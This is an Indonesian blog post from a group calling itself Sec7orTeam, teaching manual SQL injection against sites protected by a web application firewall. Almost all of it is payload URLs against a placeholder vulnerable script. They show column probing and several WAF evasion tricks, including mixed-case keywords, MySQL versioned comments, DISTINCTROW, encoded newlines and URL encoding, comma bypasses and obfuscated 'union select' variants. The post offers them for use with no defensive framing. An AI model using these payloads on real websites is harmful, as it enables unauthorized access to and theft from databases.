Analisa Manual SQL Injection with bypass WAF !!!

Hallo kamu 😄

Semoga pembaca setia blog ini selalu di beri kesehatan dan rezeki yang lancar ya 😍
Oke setiap di postingan blog saya nanti bakal ada iklan yang keliatan/muncul, tentunya tidak mengganggu sepenuhnya saat membaca maupaun berseluncur di blog saya , tapi setidaknya kliklah beberapa iklan yang ada 😚 hehehe..

Beberapa injector hanya memakai query bypass tanpa menganalisa bagian kata yg di block oleh WAF ( Web Aplication Firewall )

Sebelumnya Testing dlu
Kalau Order by tidak work . coba pakai group+by

http://www.webshit.com/vulnscript.php?id=1+order+by+1--+-
http://www.webshit.com/vulnscript.php?id=1+group+by+1--+-

Next

http://www.webshit.com/vulnscript.php?id=1+union--+- [waf]
http://www.webshit.com/vulnscript.php?id=1+select--+- [No waf]

Berarti fungsi union di block.
Kita coba bypass dngan kombinasi Uppercase dan Lowercase .

http://www.webshit.com/vulnscript.php?id=1+uNiOn--+- [waf Bypassed]

Atau kalau masih kena Waf

http://www.webshit.com/vulnscript.php?id=2 /*!uNiOn*/--+-

Atau

http://www.webshit.com/vulnscript.php?id=1+/*!50000uNiOn*/--+-

Okay bypassed
Tahap berikutnya Union Select

http://www.webshit.com/vulnscript.php?id=1+union--+- [no waf]
http://www.webshit.com/vulnscript.php?id=1+select--+- [no waf]

Tapi saat

http://www.webshit.com/vulnscript.php?id=1+union+select--+- [Waf]

Berararti Waf block kombinasi kata union select ..
Kita bisa bypass dengan

http://www.webshit.com/vulnscript.php?id=1+union+distinctROW+select--+-

Atau

http://www.webshit.com/vulnscript.php?id=1+union%23%0aselect--+-

Yuhuu Bypassed

Next

Bypass dengan url Encode juga bisa

http://www.webshit.com/vulnscript.php?id=1+%75Nion+%73eLect--+-

%75 = u
%73 = s

Next

http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1--+- [no waf]
http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,2--+- [waf]

Hhm ketika menambah (,) kena waf , berarti koma harus di bypass

http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,~~2--+- [bypassed]
http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,~~2,~~3,~~4,~~5--+- [bypassed]

Atau

http://www.webshit.com/vulnscript.php?id=1+uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- - [bypassed]

Atau dgn method join
beberapa injector menggunakan UnionOnOn /
Alternativ bypass union select jika langkah diatas blm bs bypass .

uni<>on sel<>ect
uni*on sel*ect
(uni)(on) (sel)(ect)
uni[]on sel[]ect
uni\on sel\ect

Thanks : Rathna Sekhar (Unique) And Pak Verry

--Sec7orTeam

Oke terimakasih atas kunjungannya dan jangan lupa klik iklan yang ada and share artikel ini jika bermanfaat 😄 kalo ada kesalahan ketik atau tanda baca di artikel ini saya minta maaf.